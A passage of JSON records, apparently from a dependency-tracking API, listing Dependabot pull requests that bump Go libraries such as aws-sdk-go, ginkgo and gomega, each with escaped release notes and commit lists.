href=\"https://github.com/go-git/go-git/commit/f415670d906b5c6169d1fdc64f3f9f1d33eb6f9c\"\u003e\u003ccode\u003ef415670\u003c/code\u003e\u003c/a\u003e plumbing: object, Decode Tag headers via a state machine\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/5b0cd38a62e2336bb5f1a2ad0eb8ac8f9e7b740e\"\u003e\u003ccode\u003e5b0cd38\u003c/code\u003e\u003c/a\u003e plumbing: object, Reject multi-signature commits at Verify\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fe8ed6223a6079d9fd84d853362a996e7df175fb\"\u003e\u003ccode\u003efe8ed62\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tag.EncodeWithoutSignature with Commit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/98e337d5bdc4c0536a40ab7381b2231f7e0b15cd\"\u003e\u003ccode\u003e98e337d\u003c/code\u003e\u003c/a\u003e plumbing: object, Add support for Tag.SignatureSHA256\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.38.2 to 1.40.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.40.0\u003c/h2\u003e\n\u003ch2\u003e1.40.0\u003c/h2\u003e\n\u003cp\u003eWe're adopting a new release strategy to minimize dependency bloat in projects that consume Gomega.  It is a limitation of the go mod toolchain that \u003cem\u003etest\u003c/em\u003e subdependencies of your project's direct dependencies get pulled in as \u003cem\u003eindirect\u003c/em\u003e dependencies.  In the case of Gomega, this ends up pulling in all of Ginkgo into your \u003ccode\u003ego.mod\u003c/code\u003e even if you are only using Gomega (Gomega uses Ginkgo for its own tests).\u003c/p\u003e\n\u003cp\u003eGoing forward, releases will strip out all tests, tidy up the \u003ccode\u003ego.mod\u003c/code\u003e and then push this stripped down version to a new \u003ccode\u003emaster-lite\u003c/code\u003e branch.  These stripped-down versions will receive the \u003ccode\u003evx.y.z\u003c/code\u003e git tag and will be picked up by the go toolchain.\u003c/p\u003e\n\u003cp\u003ePlease open an issue if this new release process causes unexpected changes for your projects.\u003c/p\u003e\n\u003ch2\u003ev1.39.1\u003c/h2\u003e\n\u003ch2\u003e1.39.1\u003c/h2\u003e\n\u003cp\u003eUpdate all dependencies.  This auto-updated the required version of Go to 1.24, consistent with the fact that Go 1.23 has been out of support for almost six months.\u003c/p\u003e\n\u003ch2\u003ev1.39.0\u003c/h2\u003e\n\u003ch2\u003e1.39.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eAdd \u003ccode\u003eMatchErrorStrictly\u003c/code\u003e which only passes if \u003ccode\u003eerrors.Is(actual, expected)\u003c/code\u003e returns true.  \u003ccode\u003eMatchError\u003c/code\u003e, by contrast, will fallback to string comparison.\u003c/p\u003e\n\u003ch2\u003ev1.38.3\u003c/h2\u003e\n\u003ch2\u003e1.38.3\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e...\n\n_Description has been truncated_","html_url":"https://github.com/simple-container-com/api/pull/252","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/simple-container-com%2Fapi/issues/252","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/252/packages"}},{"old_version":"1.49.19","new_version":"1.55.8","update_type":"minor","path":null,"pr_created_at":"2026-05-11T03:57:05.000Z","version_change":"1.49.19 → 1.55.8","issue":{"uuid":"4417965683","node_id":"PR_kwDOJqDRWc7aGh9a","number":6,"state":"open","title":"Bump the dependencies group with 5 updates","user":"dependabot[bot]","labels":[],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-05-11T03:57:05.000Z","updated_at":"2026-05-19T23:14:16.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"dependencies","update_count":5,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.49.19","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/onsi/ginkgo/v2","old_version":"2.13.2","new_version":"2.15.0","repository_url":"https://github.com/onsi/ginkgo"},{"name":"github.com/onsi/gomega","old_version":"1.29.0","new_version":"1.31.1","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/google/go-cmp","old_version":"0.6.0","new_version":"0.7.0","repository_url":"https://github.com/google/go-cmp"},{"name":"golang.org/x/sync","old_version":"0.6.0","new_version":"0.20.0","repository_url":"https://github.com/golang/sync"}],"path":null,"ecosystem":"go"},"body":"Bumps the dependencies group with 5 updates:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.49.19` | `1.55.8` |\n| [github.com/onsi/ginkgo/v2](https://github.com/onsi/ginkgo) | `2.13.2` | `2.15.0` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.29.0` | `1.31.1` |\n| [github.com/google/go-cmp](https://github.com/google/go-cmp) | `0.6.0` | `0.7.0` |\n| [golang.org/x/sync](https://github.com/golang/sync) | `0.6.0` | `0.20.0` |\n\nUpdates `github.com/aws/aws-sdk-go` from 1.49.19 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.49.19...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/ginkgo/v2` from 2.13.2 to 2.15.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/ginkgo/releases\"\u003egithub.com/onsi/ginkgo/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.15.0\u003c/h2\u003e\n\u003ch2\u003e2.15.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eJUnit reports now interpret Label(owner:X) and set owner to X. [8f3bd70]\u003c/li\u003e\n\u003cli\u003einclude cancellation reason when cancelling spec context [96e915c]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eemit output of failed go tool cover invocation so users can try to debug things for themselves [c245d09]\u003c/li\u003e\n\u003cli\u003efix outline when using nodot in ginkgo v2 [dca77c8]\u003c/li\u003e\n\u003cli\u003eDocument areas where GinkgoT() behaves differently from testing.T [dbaf18f]\u003c/li\u003e\n\u003cli\u003ebugfix(docs): use Unsetenv instead of Clearenv (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1337\"\u003e#1337\u003c/a\u003e) [6f67a14]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump to go 1.20 [4fcd0b3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.14.0\u003c/h2\u003e\n\u003ch2\u003e2.14.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eYou can now use \u003ccode\u003eGinkgoTB()\u003c/code\u003e when you need an instance of \u003ccode\u003etesting.TB\u003c/code\u003e to pass to a library.\u003c/p\u003e\n\u003cp\u003ePrior to this release table testing only supported generating individual \u003ccode\u003eIt\u003c/code\u003es for each test entry.  \u003ccode\u003eDescribeTableSubtree\u003c/code\u003e extends table testing support to entire testing subtrees - under the hood \u003ccode\u003eDescrieTableSubtree\u003c/code\u003e generates a new container for each entry and invokes your function to fill our the container.  See the \u003ca href=\"https://onsi.github.io/ginkgo/#generating-subtree-tables\"\u003edocs\u003c/a\u003e to learn more.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIntroduce DescribeTableSubtree [65ec56d]\u003c/li\u003e\n\u003cli\u003eadd GinkgoTB() to docs [4a2c832]\u003c/li\u003e\n\u003cli\u003eAdd GinkgoTB() function (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1333\"\u003e#1333\u003c/a\u003e) [92b6744]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix typo in internal/suite.go (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1332\"\u003e#1332\u003c/a\u003e) [beb9507]\u003c/li\u003e\n\u003cli\u003eFix typo in docs/index.md (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1319\"\u003e#1319\u003c/a\u003e) [4ac3a13]\u003c/li\u003e\n\u003cli\u003eallow wasm to compile with ginkgo present (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1311\"\u003e#1311\u003c/a\u003e) [b2e5bc5]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.16.0 to 0.16.1 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1316\"\u003e#1316\u003c/a\u003e) [465a8ec]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1313\"\u003e#1313\u003c/a\u003e) [eab0e40]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1317\"\u003e#1317\u003c/a\u003e) [fbf9724]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/crypto (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1318\"\u003e#1318\u003c/a\u003e) [3ee80ee]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.14.0 to 0.16.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1306\"\u003e#1306\u003c/a\u003e) [123e1d5]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/gomega from 1.29.0 to 1.30.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1297\"\u003e#1297\u003c/a\u003e) [558f6e0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1307\"\u003e#1307\u003c/a\u003e) [84ff7f3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/ginkgo/blob/master/CHANGELOG.md\"\u003egithub.com/onsi/ginkgo/v2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.15.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eJUnit reports now interpret Label(owner:X) and set owner to X. [8f3bd70]\u003c/li\u003e\n\u003cli\u003einclude cancellation reason when cancelling spec context [96e915c]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eemit output of failed go tool cover invocation so users can try to debug things for themselves [c245d09]\u003c/li\u003e\n\u003cli\u003efix outline when using nodot in ginkgo v2 [dca77c8]\u003c/li\u003e\n\u003cli\u003eDocument areas where GinkgoT() behaves differently from testing.T [dbaf18f]\u003c/li\u003e\n\u003cli\u003ebugfix(docs): use Unsetenv instead of Clearenv (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1337\"\u003e#1337\u003c/a\u003e) [6f67a14]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump to go 1.20 [4fcd0b3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.14.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cp\u003eYou can now use \u003ccode\u003eGinkgoTB()\u003c/code\u003e when you need an instance of \u003ccode\u003etesting.TB\u003c/code\u003e to pass to a library.\u003c/p\u003e\n\u003cp\u003ePrior to this release table testing only supported generating individual \u003ccode\u003eIt\u003c/code\u003es for each test entry.  \u003ccode\u003eDescribeTableSubtree\u003c/code\u003e extends table testing support to entire testing subtrees - under the hood \u003ccode\u003eDescrieTableSubtree\u003c/code\u003e generates a new container for each entry and invokes your function to fill our the container.  See the \u003ca href=\"https://onsi.github.io/ginkgo/#generating-subtree-tables\"\u003edocs\u003c/a\u003e to learn more.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eIntroduce DescribeTableSubtree [65ec56d]\u003c/li\u003e\n\u003cli\u003eadd GinkgoTB() to docs [4a2c832]\u003c/li\u003e\n\u003cli\u003eAdd GinkgoTB() function (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1333\"\u003e#1333\u003c/a\u003e) [92b6744]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix typo in internal/suite.go (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1332\"\u003e#1332\u003c/a\u003e) [beb9507]\u003c/li\u003e\n\u003cli\u003eFix typo in docs/index.md (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1319\"\u003e#1319\u003c/a\u003e) [4ac3a13]\u003c/li\u003e\n\u003cli\u003eallow wasm to compile with ginkgo present (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1311\"\u003e#1311\u003c/a\u003e) [b2e5bc5]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.16.0 to 0.16.1 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1316\"\u003e#1316\u003c/a\u003e) [465a8ec]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1313\"\u003e#1313\u003c/a\u003e) [eab0e40]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1317\"\u003e#1317\u003c/a\u003e) [fbf9724]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/crypto (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1318\"\u003e#1318\u003c/a\u003e) [3ee80ee]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/tools from 0.14.0 to 0.16.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1306\"\u003e#1306\u003c/a\u003e) [123e1d5]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/gomega from 1.29.0 to 1.30.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1297\"\u003e#1297\u003c/a\u003e) [558f6e0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1307\"\u003e#1307\u003c/a\u003e) [84ff7f3]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/7fa019079a7b6cfe92acac92df4a84f2748e45a4\"\u003e\u003ccode\u003e7fa0190\u003c/code\u003e\u003c/a\u003e v2.15.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/c245d09a1a083f643ad2b91878cf060146cc94e3\"\u003e\u003ccode\u003ec245d09\u003c/code\u003e\u003c/a\u003e emit output of failed go tool cover invocation so users can try to debug thin...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/dca77c807c02fbc18dcc957c8e605424dbb5a891\"\u003e\u003ccode\u003edca77c8\u003c/code\u003e\u003c/a\u003e fix outline when using nodot inginkgo v2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/96e915c326d0265f3bb0f662672573f124fcd38d\"\u003e\u003ccode\u003e96e915c\u003c/code\u003e\u003c/a\u003e include cancellation reason when cancelling spec context\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/4fcd0b3559d887317826a9d604b947d6b2b52b1c\"\u003e\u003ccode\u003e4fcd0b3\u003c/code\u003e\u003c/a\u003e Bump to go 1.20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/732abbc3e709c4913e7f0644c1aee1faf076f0ea\"\u003e\u003ccode\u003e732abbc\u003c/code\u003e\u003c/a\u003e clarify that last owner label wins\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/8f3bd70cc78b00986aaf7fc8e9fbd77df05e6b26\"\u003e\u003ccode\u003e8f3bd70\u003c/code\u003e\u003c/a\u003e JUnit reports now interpret Label(owner:X) and set owner to X.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/dbaf18fd0af2b798961b08ee9c0a3266d3abadd6\"\u003e\u003ccode\u003edbaf18f\u003c/code\u003e\u003c/a\u003e Document areas where GinkgoT() behaves differently from testing.T\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/6f67a147b39873678462615d412cfb0177463bf1\"\u003e\u003ccode\u003e6f67a14\u003c/code\u003e\u003c/a\u003e bugfix(docs): use Unsetenv instead of Clearenv (\u003ca href=\"https://redirect.github.com/onsi/ginkgo/issues/1337\"\u003e#1337\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/onsi/ginkgo/commit/beaf16d17f98f30365a11ff236583d611c094078\"\u003e\u003ccode\u003ebeaf16d\u003c/code\u003e\u003c/a\u003e v2.14.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/onsi/ginkgo/compare/v2.13.2...v2.15.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/onsi/gomega` from 1.29.0 to 1.31.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/onsi/gomega/releases\"\u003egithub.com/onsi/gomega's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.31.1\u003c/h2\u003e\n\u003ch2\u003e1.31.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eInverted arguments order of FailureMessage of BeComparableToMatcher [e0dd999]\u003c/li\u003e\n\u003cli\u003eUpdate test in case keeping msg is desired [ad1a367]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow how to import the format sub package [24e958d]\u003c/li\u003e\n\u003cli\u003etidy up go.sum [26661b8]\u003c/li\u003e\n\u003cli\u003ebump dependencies [bde8f7a]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.31.0\u003c/h2\u003e\n\u003ch2\u003e1.31.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAsync assertions include context cancellation cause if present [121c37f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump minimum go version [dee1e3c]\u003c/li\u003e\n\u003cli\u003edocs: fix typo in example usage \u0026quot;occured\u0026quot; -\u0026gt; \u0026quot;occurred\u0026quot; [49005fe]\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 4 to 5 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/714\"\u003e#714\u003c/a\u003e) [f1c8757]\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/715\"\u003e#715\u003c/a\u003e) [9836e76]\u003c/li\u003e\n\u003cli\u003eBump github.com/onsi/ginkgo/v2 from 2.13.0 to 2.13.2 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/713\"\u003e#713\u003c/a\u003e) [54726f0]\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/net from 0.17.0 to 0.19.0 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/711\"\u003e#711\u003c/a\u003e) [df97ecc]\u003c/li\u003e\n\u003cli\u003edocs: fix \u003ccode\u003eHaveExactElement\u003c/code\u003e typo (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/712\"\u003e#712\u003c/a\u003e) [a672c86]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.30.0\u003c/h2\u003e\n\u003ch2\u003e1.30.0\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBeTrueBecause and BeFalseBecause allow for better failure messages [4da4c7f]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eMaintenance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump actions/checkout from 3 to 4 (\u003ca href=\"https://redirect.github.com/onsi/gomega/issues/694\"\u003e#694\u003c/a\u003e) 